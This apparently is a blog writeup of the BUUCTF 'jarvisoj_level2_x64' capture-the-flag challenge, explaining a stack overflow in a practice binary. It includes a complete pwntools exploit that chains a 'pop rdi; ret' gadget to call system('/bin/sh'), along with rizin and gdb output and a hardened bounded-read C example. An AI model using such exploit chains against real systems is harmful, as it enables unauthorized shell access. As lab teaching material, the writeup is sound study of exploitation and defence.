Here I finish the jarvisoj_level2_x64 1 challenge on BUUCTF, and this is my writeup.

(I write this blog in English to protect it from CSDN.)

I will post my code here and explain it.

Code

```python
from pwn import *

padding = 128 + 8  # fill the 0x80-byte stack buffer plus the saved rbp
payload = b'a' * padding
evil_addr = 0x00000000004006b3   # gadget: pop rdi ; ret
evil_addr1 = 0x00400603          # the "call sym.imp.system" instruction inside vulnerable_function
e = ELF("level2_x64")
sh_addr = 0x00600a90             # the "hint" object, which holds "/bin/sh"
system_plt = e.plt['system']     # system@plt, an alternative return target (unused below)
# overwrite the return address with the gadget, feed it the "/bin/sh" pointer,
# then return into "call system"
payload += p64(evil_addr) + p64(sh_addr) + p64(evil_addr1)
p = process("./level2_x64")
# pause()
p.sendline(payload)
p.interactive()
```

Analyse the code

I use rizin for static analysis and gdb for dynamic debugging.

```text
> rizin level2_x64
[0x00400500]> iE
nth paddr vaddr bind type size lib name
---------------------------------------------------------------------
45 0x000006c0 0x004006c0 GLOBAL FUNC 2 __libc_csu_fini
48 ---------- 0x00600a98 GLOBAL NOTYPE 0 _edata
49 0x000006c4 0x004006c4 GLOBAL FUNC 0 _fini
51 0x000005f6 0x004005f6 GLOBAL FUNC 42 vulnerable_function
54 0x00000a80 0x00600a80 GLOBAL NOTYPE 0 __data_start
56 0x00000a88 0x00600a88 GLOBAL OBJ 0 __dso_handle
57 0x000006d0 0x004006d0 GLOBAL OBJ 4 _IO_stdin_used
58 0x00000650 0x00400650 GLOBAL FUNC 101 __libc_csu_init
59 ---------- 0x00600aa0 GLOBAL NOTYPE 0 _end
60 0x00000500 0x00400500 GLOBAL FUNC 0 _start
61 ---------- 0x00600a98 GLOBAL NOTYPE 0 __bss_start
62 0x00000620 0x00400620 GLOBAL FUNC 37 main
63 0x00000a90 0x00600a90 GLOBAL OBJ 8 hint
65 ---------- 0x00600a98 GLOBAL OBJ 0 __TMC_END__
67 0x00000488 0x00400488 GLOBAL FUNC 0 _init
```

We will dive into the main function and vulnerable_function.

Let's look at main first.

Decompiling it with rizin (pdg) gives this result:

```text
[0x00400620]> pdg
void main(int argc, char **argv)
{
    char **var_18h;
    int var_ch;
    sym.vulnerable_function();
    sym.imp.system("echo \'Hello World!\'");
    return;
}
```

Now go into vulnerable_function for more details:

```text
void sym.vulnerable_function(void)
{
    void *buf;
    sym.imp.system("echo Input:");
    sym.imp.read(0, &buf, 0x200);
    return;
}
```

Something is strange: notice the read function's buffer argument. I will check the assembly code for more details.

```text
[0x004005f6]> pdf
; CALL XREF from main @ 0x400634
sym.vulnerable_function();
; var void *buf @ stack - 0x88
0x004005f6 push rbp
0x004005f7 mov rbp, rsp
0x004005fa add rsp, 0xffffffffffffff80
0x004005fe mov edi, str.echo_Input: ; 0x4006d4 ; "echo Input:" ; const char *string
0x00400603 call sym.imp.system ; sym.imp.system ; int system(const char *string)
0x00400608 lea rax, [buf]
0x0040060c mov edx, 0x200 ; 512 ; size_t nbyte
0x00400611 mov rsi, rax ; void *buf
0x00400614 mov edi, 0 ; int fildes
0x00400619 call sym.imp.read ; sym.imp.read ; ssize_t read(int fildes, void *buf, size_t nbyte)
0x0040061e leave
0x0040061f ret
```

Now it is clear: the destination address passed to read points at [buf], which is located on the stack.

read receives up to 0x200 bytes here, which can be much larger than the stack buffer, and there is no canary protection either, so we can trigger a stack overflow via the read function.
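As an added example (not the challenge's source and not the author's code), here is the vulnerable pattern from the decompile beside a hardened reader whose limit is tied to the buffer size; the names `read_input_bounded` and `demo_bounded_read` are chosen here, and the 512-byte input is constructed for the self-check.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUF_SIZE 128   /* vulnerable_function reserves 0x80 bytes (add rsp, -0x80) */

/* Reconstruction of vulnerable_function (never called here): read() may write 0x200
 * bytes into a 128-byte stack buffer and clobber the saved rbp and return address. */
void vulnerable_function(void)
{
    char buf[BUF_SIZE];
    system("echo Input:");
    if (read(0, buf, 0x200) < 0)   /* BUG: the limit is unrelated to sizeof(buf) */
        return;
}

/* Hardened variant: the limit comes from the buffer itself, one byte is reserved for
 * a terminator, and the caller learns how many bytes were really consumed. */
ssize_t read_input_bounded(int fd, char *buf, size_t bufsize)
{
    if (buf == NULL || bufsize == 0)
        return -1;
    ssize_t n = read(fd, buf, bufsize - 1);
    if (n < 0)
        return -1;
    buf[n] = '\0';
    return n;
}

/* Constructed self-check: push the challenge's 0x200 bytes through a pipe into a 128-byte buffer. */
ssize_t demo_bounded_read(void)
{
    int fds[2];
    char input[0x200], buf[BUF_SIZE];
    if (pipe(fds) != 0)
        return -1;
    memset(input, 'a', sizeof input);
    if (write(fds[1], input, sizeof input) != (ssize_t)sizeof input)
        return -1;
    close(fds[1]);
    ssize_t n = read_input_bounded(fds[0], buf, sizeof buf);   /* 127; the rest stays in the pipe */
    close(fds[0]);
    return n;
}

int main(void)
{
    printf("hardened reader accepted %zd of 512 bytes\n", demo_bounded_read());
    return 0;
}
```

Building with -fstack-protector would add the canary the writeup notes is missing, but the real fix is the bounded read: a size derived from the buffer leaves nothing to overflow.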

Dynamic debugging

We use gdb to find the exact padding length for the stack overflow.

```text
> gdb vulnerable_function
> c
(gdb) disassemble
Dump of assembler code for function vulnerable_function:
0x00000000004005f6 <+0>: push %rbp
0x00000000004005f7 <+1>: mov %rsp,%rbp
=> 0x00000000004005fa <+4>: add $0xffffffffffffff80,%rsp
0x00000000004005fe <+8>: mov $0x4006d4,%edi
0x0000000000400603 <+13>: call 0x4004c0 <system@plt>
0x0000000000400608 <+18>: lea -0x80(%rbp),%rax
0x000000000040060c <+22>: mov $0x200,%edx
0x0000000000400611 <+27>: mov %rax,%rsi
0x0000000000400614 <+30>: mov $0x0,%edi
0x0000000000400619 <+35>: call 0x4004d0 <read@plt>
0x000000000040061e <+40>: leave
0x000000000040061f <+41>: ret
End of assembler dump.
(gdb) b *vulnerable_function+40
(gdb) c
Continuing.
[Detaching after vfork from child process 730797]
Input:
AAAAAAAA
```

Now we have put 8 A's on the stack; let's check where they are so we can calculate the exact length.

```text
(gdb) x/64wx $rsp
0x7fffffffe3b0: 0x41414141 0x41414141 0x0000080a 0x00000000
0x7fffffffe3c0: 0x00000002 0x00000000 0x00000006 0x80000000
0x7fffffffe3d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe3e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe3f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe400: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe410: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe420: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe430: 0xffffe450 0x00007fff 0x00400639 0x00000000
0x7fffffffe440: 0xffffe578 0x00007fff 0xffffe578 0x00000001
0x7fffffffe450: 0xffffe4f0 0x00007fff 0xf7db7e08 0x00007fff
0x7fffffffe460: 0xffffe4a0 0x00007fff 0xffffe578 0x00007fff
0x7fffffffe470: 0x00400040 0x00000001 0x00400620 0x00000000
0x7fffffffe480: 0xffffe578 0x00007fff 0x2ef7ab9e 0x5b0c92b4
0x7fffffffe490: 0x00000001 0x00000000 0x00000000 0x00000000
0x7fffffffe4a0: 0xf7ffd000 0x00007fff 0x00000000 0x00000000
(gdb) p $rbp
$1 = (void *) 0x7fffffffe430
```

It is obvious that the length we need is |0x7fffffffe3b0 - 0x7fffffffe430| + 8, that is, 0x80 + 8.

(To explain why we add 8: the difference only covers the distance from rsp to the low address of the saved rbp, but we need to reach the high end of the saved rbp, where the return address starts, so we add 8 bytes on an x64 machine.)

Now we can exploit vulnerable_function and control the program to execute any code located in the program.

But what we want is a bash shell, or something that can execute commands.

We have two choices:

I. Allocate memory, write shellcode into it, then jump to it and execute it.

II. Jump somewhere that already does what we need and change its arguments to reach our target.

For I, this is hard: we can only redirect control flow, we cannot actually allocate memory and write something into it (maybe we could chain a bunch of pop|ret gadgets and go into libc to allocate memory, but that needs more details about the program).

For II, it is much easier. Attention: there is something special for us.

Do you remember the first output?

```text
[0x00400500]> iE
nth paddr vaddr bind type size lib name
---------------------------------------------------------------------
45 0x000006c0 0x004006c0 GLOBAL FUNC 2 __libc_csu_fini
48 ---------- 0x00600a98 GLOBAL NOTYPE 0 _edata
49 0x000006c4 0x004006c4 GLOBAL FUNC 0 _fini
51 0x000005f6 0x004005f6 GLOBAL FUNC 42 vulnerable_function
54 0x00000a80 0x00600a80 GLOBAL NOTYPE 0 __data_start
56 0x00000a88 0x00600a88 GLOBAL OBJ 0 __dso_handle
57 0x000006d0 0x004006d0 GLOBAL OBJ 4 _IO_stdin_used
58 0x00000650 0x00400650 GLOBAL FUNC 101 __libc_csu_init
59 ---------- 0x00600aa0 GLOBAL NOTYPE 0 _end
60 0x00000500 0x00400500 GLOBAL FUNC 0 _start
61 ---------- 0x00600a98 GLOBAL NOTYPE 0 __bss_start
62 0x00000620 0x00400620 GLOBAL FUNC 37 main
63 0x00000a90 0x00600a90 GLOBAL OBJ 8 hint
65 ---------- 0x00600a98 GLOBAL OBJ 0 __TMC_END__
67 0x00000488 0x00400488 GLOBAL FUNC 0 _init
```

There is an object called hint at address 0x00600a90.

Let's check what it is:

```text
[0x00400500]> px @ 0x00600a90
- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0x00600a90  2f62 696e 2f73 6800 0000 0000 0000 0000  /bin/sh.........
0x00600aa0  ffff ffff ffff ffff 0000 0000 0000 0000  ................
0x00600ab0  0000 0000 0000 0000 0000 0000 0000 0000  ................
0x00600ac0  0000 0000 0000 0000 0000 0000 0000 0000  ................
0x00600ad0  ffff ffff ffff ffff ffff ffff ffff ffff  ................
0x00600ae0  ffff ffff ffff ffff ffff ffff ffff ffff  ................
0x00600af0  ffff ffff ffff ffff ffff ffff ffff ffff  ................
0x00600b00  ffff ffff ffff ffff ffff ffff ffff ffff  ................
0x00600b10  ffff ffff ffff ffff ffff ffff ffff ffff  ................
0x00600b20  ffff ffff ffff ffff ffff ffff ffff ffff  ................
0x00600b30  ffff ffff ffff ffff ffff ffff ffff ffff  ................
0x00600b40  ffff ffff ffff ffff ffff ffff ffff ffff  ................
0x00600b50  ffff ffff ffff ffff ffff ffff ffff ffff  ................
0x00600b60  ffff ffff ffff ffff ffff ffff ffff ffff  ................
0x00600b70  ffff ffff ffff ffff ffff ffff ffff ffff  ................
0x00600b80  ffff ffff ffff ffff ffff ffff ffff ffff  ................
```

It is a string containing '/bin/sh', which can be the argument to system to spawn a shell.

OK, now find the system function; we just need assembly code like "call system".

We have almost won the game!

First we need to find the assembly code "call system".

Before we jump there we need to replace the original argument with the address of '/bin/sh'.

Does it look familiar? Yes, we have seen it in vulnerable_function:

```text
[0x004005f6]> pdf
; CALL XREF from main @ 0x400634
sym.vulnerable_function();
; var void *buf @ stack - 0x88
0x004005f6 push rbp
0x004005f7 mov rbp, rsp
0x004005fa add rsp, 0xffffffffffffff80
0x004005fe mov edi, str.echo_Input: ; 0x4006d4 ; "echo Input:" ; const char *string
0x00400603 call sym.imp.system ; sym.imp.system ; int system(const char *string)
0x00400608 lea rax, [buf]
0x0040060c mov edx, 0x200 ; 512 ; size_t nbyte
0x00400611 mov rsi, rax ; void *buf
0x00400614 mov edi, 0 ; int fildes
0x00400619 call sym.imp.read ; sym.imp.read ; ssize_t read(int fildes, void *buf, size_t nbyte)
0x0040061e leave
0x0040061f ret
```

Now we can jump to 0x00400603 with rdi holding the address of '/bin/sh'.

ROP

If you do not understand what ROP is, go and learn it first, then come back and continue.

```text
$ ROPgadget --binary level2_x64 --only "pop|ret" | grep rdi
0x00000000004006b3 : pop rdi ; ret
```

So we got one gadget, and it is enough.

We got the flag!

Here is what the stack looks like after we send the payload:

```text
(gdb) x/64wx $rsp
rsp-> 0x7ffc0a0ce240: 0x61616161 0x61616161 0x61616161 0x61616161
      0x7ffc0a0ce250: 0x61616161 0x61616161 0x61616161 0x61616161
      0x7ffc0a0ce260: 0x61616161 0x61616161 0x61616161 0x61616161
      0x7ffc0a0ce270: 0x61616161 0x61616161 0x61616161 0x61616161
      0x7ffc0a0ce280: 0x61616161 0x61616161 0x61616161 0x61616161
      0x7ffc0a0ce290: 0x61616161 0x61616161 0x61616161 0x61616161
      0x7ffc0a0ce2a0: 0x61616161 0x61616161 0x61616161 0x61616161
      0x7ffc0a0ce2b0: 0x61616161 0x61616161 0x61616161 0x61616161
rbp-> 0x7ffc0a0ce2c0: 0x61616161 0x61616161 0x004006b3 0x00000000 <- return address (pop rdi ; ret)
sh->  0x7ffc0a0ce2d0: 0x00600a90 0x00000000 0x00400603 0x00000000 <- call system address
      0x7ffc0a0ce2e0: 0x0a0ce30a 0x00007ffc 0xd226fe08 0x00007897
      0x7ffc0a0ce2f0: 0x0a0ce330 0x00007ffc 0x0a0ce408 0x00007ffc
      0x7ffc0a0ce300: 0x00400040 0x00000001 0x00400620 0x00000000
      0x7ffc0a0ce310: 0x0a0ce408 0x00007ffc 0xd585d4a1 0x05f8e39e
      0x7ffc0a0ce320: 0x00000001 0x00000000 0x00000000 0x00000000
      0x7ffc0a0ce330: 0xd24b5000 0x00007897 0x00000000 0x00000000
```

The function will return to address 0x4006b3, which contains the assembly "pop rdi; ret".

Now it executes pop rdi, which pops the next stack word into rdi: that is the '/bin/sh' address (sh_addr).

Then it executes ret again, which is equivalent to "pop rip", so it returns to "call system".

Finally you get the shell.

Thanks for reading.
